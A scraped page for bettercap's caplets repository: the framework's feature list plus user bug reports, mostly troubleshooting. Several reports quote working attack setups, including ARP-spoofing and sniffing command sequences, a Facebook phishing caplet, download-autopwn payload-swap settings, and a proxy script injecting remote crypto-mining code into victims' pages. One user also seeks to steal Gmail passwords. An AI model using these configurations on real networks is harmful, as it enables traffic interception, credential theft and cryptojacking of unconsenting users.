
caplets's Introduction

Join the project community on our server!


BetterCap


bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.


Main Features

  • WiFi networks scanning, deauthentication attack, clientless PMKID association attack and automatic WPA/WPA2 client handshakes capture.
  • Bluetooth Low Energy devices scanning, characteristics enumeration, reading and writing.
  • 2.4GHz wireless devices scanning and MouseJacking attacks with over-the-air HID frames injection (with DuckyScript support).
  • Passive and active IP network hosts probing and recon.
  • ARP, DNS, NDP and DHCPv6 spoofers for MITM attacks on IPv4 and IPv6 based networks.
  • Proxies at packet level, TCP level and HTTP/HTTPS application level, fully scriptable with easy to implement JavaScript plugins.
  • A powerful network sniffer for credentials harvesting which can also be used as a network protocol fuzzer.
  • A very fast port scanner.
  • A powerful REST API with support for asynchronous events notification on websocket to orchestrate your attacks easily.
  • A very convenient web UI.
  • More!

License

bettercap is made with ♥ by the dev team and it's released under the GPL 3 license.


caplets's People

Contributors

0xflotus, 5h4d0wb0y, benleb, bmaia, buffermet, caquino, d4vinci, dadav, evilsocket, kgretzky, mbiert, pielgrzym, realgam3


caplets's Issues

Facebook/gmail account

Before I even start to use the new version of bettercap (was dealing with other stuff), I want to know everything about this tool and generally to know about SSL and preloaded HSTS sites...
From what I see, with the new caplets that can be stored in bettercap you can use them to inject a fake Facebook/Gmail site that the victim visits to grab his password, is that right?
Or can it still not be done with websites like Gmail and Facebook because they always look for HTTPS and never load Facebook/Gmail if the page starts with HTTP (preloaded HSTS)?
Can you explain more about how this works?
There is no way that stealing a password from Gmail/Facebook is impossible....

Cannot access member of undefined errors in hstshijack

Traceback:
  TypeError: Cannot access member 'replace' of undefined
    at onRequest (<anonymous>:213:41)
    at <anonymous>:1:1

Traceback:
  TypeError: Cannot access member 'match' of undefined
    at onResponse (<anonymous>:279:13)
    at <anonymous>:1:1

Where is documentation on what a certain caplet does?

There are some caplets that don't have a README file, and in most of those that do, there is almost no information regarding what that caplet does. If this is intentional, why aren't there any links pointing directly to the more detailed documentation on each caplet? I've read the official Bettercap documentation (which I didn't find of much help) but there is no mention of each caplet specifically.

Is there a need for documentation improvement, or am I just looking in the wrong places?

Obs.: For the sake of completeness take as an example the RTFM module. There is no README and the name is an acronym 😢

doubt about caplets

Hi!
I have a doubt, and I don't know if it's a bug or a feature XD
When you load a caplet like bettercap -iface wlan0 -caplet jsinject/jsinject.cap, it gives an import error for jsinject/jsinject.js because it doesn't have the absolute path, but when you take the commands that compose that caplet and execute them in the interactive console, they work fine.
Is it a malfunction? Or am I doing something wrong?

about download autoPwn

Just missing a readme about how to use the download autoPwn payload and set up a listener? Thanks ...

WiFi got disconnected

Whenever I inject hstshijack/hstshijack, it disconnects the client device's WiFi connectivity, and later, if it connects, it's connected without internet. How to resolve?
The code I'm using:
bettercap -iface wlan0
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets <ip_address>
set net.sniff.local true
set net.sniff.filter "host <ip_address>"
arp.spoof on
net.sniff on
hstshijack/hstshijack

It works without errors, but the issue is on the device.

Hopefully you will be able to help.
(Beginner cyber security enthusiast)

hstshijack

Hi!

I have an error while using hstshijack.cap

[sys.log] [err] ReferenceError: 'custom_payload_path' is not defined

🐛 | http-ui and https-ui not working on termux

When trying to access the web UI of bettercap from a termux host, a 404 page is shown. This is because the path to the UI is configured wrong, i.e. the termux path requires /data/data/com.termux/files

http-req-dump could not get req.Client.IP

Description of the bug or feature request

Environment

Please provide:

  • Bettercap version you are using ( bettercap -version ).
    2.23
  • OS version and architecture you are using.
    Ubuntu server 18.04.2 LTS
  • Go version if building from sources.
    1.12.4

Steps to Reproduce

  1. net.probe on
  2. set targets for arp.spoof
  3. arp.spoof on
  4. set certificate for https.proxy
  5. set https.proxy.script /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.js
  6. https.proxy on

Expected behavior: The script prints the requests with the client IP

Actual behavior: The script prints the requests, but the client IP is empty


Documentation fb-phish

I am trying to figure out how these caplets are working. What I am trying at home is the fb-phishing caplet.
When I run it, no computer (HTTP nor HTTPS) is being redirected to my HTTP server.
What I tried:
DNS spoof
The victim just loses connection and says there is no internet connection
ARP spoof
Nothing gets spoofed and the computer keeps its connection
HTTP(s) Proxy with SSLstrip
Then you get the new error from Google Chrome (HSTS)

Going from the victim IP to the webserver works, and when I try to log in it redirects to facebook.com/login.php, but the login details are not saved nor displayed, thus assuming that the JavaScript injection is not working.

Victim and spoof system are both macOS, and Google Chrome.
Caplet:

set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/

set http.proxy.script caplets/fb-phish.js

http.proxy on
http.server on
arp.spoof on

Output:

bettercap v2.4 (type 'help' for a list of commands)

[14:39:55] [sys.log] [inf] Reading from caplet caplets/fb-phish.cap ...
[14:39:55] [endpoint.new] Endpoint 192.168.8.15 detected as ec:35:86:42:ac:92 (Apple).
[14:39:55] [sys.log] [inf] Enabling forwarding.
[14:39:55] [sys.log] [inf] http.proxy started on 192.168.8.16:8080 (sslstrip disabled)
[14:39:55] [sys.log] [inf] Enabling forwarding.
192.168.8.0/24 > 192.168.8.16  » [14:39:55] [sys.log] [inf] ARP spoofer started, probing 256 targets.
192.168.8.0/24 > 192.168.8.16  » [14:39:56] [sys.log] [inf] You are running 2.4 which is the latest stable version.
192.168.8.0/24 > 192.168.8.16  » active
arp.spoof (Keep spoofing selected hosts on the network.)

  arp.spoof.targets : <entire subnet>
  arp.spoof.whitelist : 

events.stream (Print events as a continuous stream.)

  events.stream.output : 

http.proxy (A full featured HTTP proxy that can be used to inject malicious contents into webpages, all HTTP traffic will be redirected to it.)

  http.proxy.sslstrip : false
  http.port : 80
  http.proxy.address : <interface address>
  http.proxy.port : 8080
  http.proxy.script : caplets/fb-phish.js

http.server (A simple HTTP server, to be used to serve files and scripts across the network.)

  http.server.path : caplets/www/www.facebook.com/
  http.server.address : 0.0.0.0
  http.server.port : 80
  http.server.certificate : 
  http.server.key : 

net.recon (Read periodically the ARP cache in order to monitor for new hosts on the network.)
192.168.8.0/24 > 192.168.8.16  » [14:40:49] [sys.log] [inf] (httpd) [ GET localhost/osd.xml
192.168.8.0/24 > 192.168.8.16  » [14:40:56] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:41:56] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:42:19] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:42:19] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:42:36] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/webstorage/process_keys/
192.168.8.0/24 > 192.168.8.16  » [14:43:20] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:43:43] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:43:44] [sys.log] [inf] (httpd) 192.168.8.16 GET 192.168.8.16/
192.168.8.0/24 > 192.168.8.16  » [14:43:45] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:43:45] [sys.log] [inf] (httpd) 192.168.8.16 GET 192.168.8.16/osd.xml
192.168.8.0/24 > 192.168.8.16  » [14:43:46] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/cookie/consent/
192.168.8.0/24 > 192.168.8.16  » [14:43:46] [sys.log] [inf] (httpd) 192.168.8.16 POST 192.168.8.16/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:45:51] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » [14:48:21] [sys.log] [inf] (httpd) [ POST localhost/ajax/bz
192.168.8.0/24 > 192.168.8.16  » 

caplets.update doesn't work on Kali Linux

I installed bettercap-caplets with command:
sudo apt install bettercap-caplets
but when I run in bettercap caplets.update I got this error:
192.168.1.0/24 > 192.168.1.2 » [22:46:27] [sys.log] [inf] caplets this command is inactive in Kali. Install the Kali package bettercap-caplets to get the caplets

Kali has installed caplets in /usr/share/bettercap/caplets/, is that the right path?

crypto-miner error

Hi, I am having some trouble deploying the crypto miner caplet, the above image is the error I get whenever doing so. Furthermore, when accessing http pages the javascript is not loaded. My bettercap version is bettercap v2.32.0 (built for linux amd64 with go1.18.1)

I have just changed a couple things in the .cap file, this is what I am using:

net.probe on
set cryptominer.name coinimp

set cryptominer.key key

set http.proxy.script crypto-miner.js

set http.proxy.sslstrip true

http.proxy on

sleep 1

net.probe off
arp.spoof on

And for the other file, I changed the coinimp js to the one I am prompted in coinimp dashboard. Here:

var green   = "\033[32m",
    reset   = "\033[0m"

function onLoad() {
    logStr = "Javascript Crypto Miner loaded.\n" +
             "\n    Miner: " + green + env["cryptominer.name"].charAt(0).toUpperCase() + env["cryptominer.name"].slice(1) + reset +
             "\n    Targets: " + green + env["arp.spoof.targets"] + reset + "\n"
    log(logStr);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            switch(env["cryptominer.name"]) {
                case "coinhive":
                    res.Body = body.replace( 
                        '</head>', 
                        '<script type="text/javascript" src="https://coinhive.com/lib/coinhive.min.js"></script>',
                        '<script> var miner = new CoinHive.Anonymous(' + env["cryptominer.key"] + '); miner.start(); </script></head>'
                    );
                    break;
                case "cryptoloot":
                    res.Body = body.replace( 
                        '</head>', 
                        '<script type="text/javascript" src="https://crypto-loot.com/lib/miner.min.js"></script>',
                        '<script> var miner = new CryptoLoot.Anonymous(' + env["cryptominer.key"] + '); miner.start(); </script></head>'
                    );
                    break;
                case "coinimp":
                    res.Body = body.replace( 
                        <script src="https://www.hostingcloud.racing/Vwfh.js"></script>’,
                        ‘<script>
    var _client = new Client.Anonymous(' + env["cryptominer.key"] + ', {
        throttle: 0, c: 'w'
    });
    _client.start();    
                        </script>’
                    );
                    break;
            }
        }
    }
}

I would appreciate any help

I keep getting the error when running hstshijack/hstshijack in bettercap

I keep getting the error when running hstshijack/hstshijack in bettercap

10.0.2.0/24 > 10.0.2.15 » [12:52:49] [sys.log] [err] type error Cannot access member 'toLowerCase' of undefined
10.0.2.0/24 > 10.0.2.15 » hstshijack/hstshijack
2021-08-09 12:58:59 inf hstshijack Generating random variable names for this session
2021-08-09 12:58:59 inf hstshijack Reading caplet
10.0.2.0/24 > 10.0.2.15 » [12:58:59] [sys.log] [err] Error while executing onLoad callback:
Traceback:
TypeError: Cannot access member 'toLowerCase' of undefined
at configure (:474:21)
at onLoad (:593:3)

Trojan

Windows 10 defender says crypto-miner.js is a trojan. Is it?

http-dump-req caplet doesn't dump nearly anything

I attach two images, one when using http.proxy and another when using https.proxy. Requests are intercepted (it seems so) but there's nearly no information logged on screen. I've looked at associated Javascript code and, in theory, a lot more data should be shown.

I'm using bettercap 2.4 in Ubuntu 17.10 64 bits, binary downloaded from official releases

With http.proxy:
http proxy

With https.proxy:
https proxy

[Hstshijack.cap] Error when loading hstshijack/hstshijack.cap

Hi!

When I try to use hstshijack.cap, I get an error when bettercap tries to load the hstshijack.js file.
Strangely, it works if I'm modifying the .cap file to include a full path of the js file for the "set http.proxy.script" option.

Command used to run the tool:

sudo bettercap -caplet /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap

or when including the caplet in a live run

bettercap
include /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap

Error log:

bettercap v2.9 (type 'help' for a list of commands)
[13:39:13] [sys.log] [inf] loading proxy script hstshijack/hstshijack.js ...
[13:39:13] [sys.log] [err] Error while running caplet /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap: open hstshijack/hstshijack.js: no such file or directory

System:
Arch Linux 4.18.8.a-1-hardened
Installed via the AUR package bettercap-git

Bettercap version:
bettercap v2.9

[EDIT]
Cheers & thanks for this awesome tool.

pita.cap exit status 1

I'm trying to run the pita.cap, but it fails with exit status 1 on the !monstop. I run P4wnP1_aloa (kali linux 4.14.80-Re4son+) on a Raspberry Pi Zero W.
I checked the processes that can interfere with the monitor mode with:

airmon-ng check
airmon-ng check kill

In general, I have to kill avahi-daemon, wpa_supplicant and dhcpcd.

I put wlan0 in monitor mode with:

airmon-ng start wlan0

Now I tried to start pita.cap:

bettercap -iface wlan0mon -caplet /usr/local/share/bettercap/caplets/pita.cap

I got this error:
[sys.log] [err] error while running caplet /usr/local/share/bettercap/caplets/pita.cap: exit status 1

I tried the command !monstop and I got the same error. If I remove this command from the pita.cap, the script starts, but I rapidly get this error:
[sys.log] [err] wifi could not inject WiFi packet: send: Resource temporarily unavailable

Is it normal? What is the use of !monstop in that script, and is it important to avoid error...?

Getting a certificate signing error

Description

While trying to install caplets in bettercap/dev I receive certificate signing errors.

Expected Behaviour

Caplets should be signed by a proper certificate and no error should appear.

Log

caplets.update
[16:41:57] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
192.168.65.0/24 > 192.168.65.3  » [16:41:57] [sys.log] [err] Get https://github.com/bettercap/caplets/archive/master.zip: x509: certificate signed by unknown authority

hstshijack exit code 4

Running hstshijack generates an error. Couldn't find anything about this error.

Environment

  • Version 2.23.
  • Kali Linux 3.10.73, aarch64.
  • Command line: bettercap -iface wlan0.
  • hstshijack/hstshijack.

Steps to Reproduce

  1. hstshijack/hstshijack

Expected behavior: caplet runs successfully

Actual behavior: [sys.log] [err] exit status 4

TypeError: Cannot access member 'toLowerCase' of undefined

Description of the bug or feature request

Environment
Please provide:

Bettercap version you are using ( bettercap -version ).
bettercap v2.24.1 (built for linux amd64 with go1.11.6)

OS version and architecture you are using.
Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux

Steps to Reproduce

set downloadautopwn.devices android,windows

set downloadautopwn.useragent.android Android
set downloadautopwn.useragent.windows Windows|WOW64
set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip
set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip

set downloadautopwn.resizepayloads true

set http.proxy.script /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js

http.proxy on


local-sniffer.cap doesn't work with ICMP packets

If I run ./bettercap -caplet caplets/local-sniffer.cap in one terminal and I run ping whatever in another terminal on the same machine (net.sniff.local is set to true), no packet appears on Bettercap's screen.

If I run ping from another machine while doing ARP spoofing against that machine (basically, adding set arp.spoof.targets ipRemoteMachine ; arp.spoof on before the net.sniff on line in the local-sniffer.cap caplet), it doesn't show anything either.
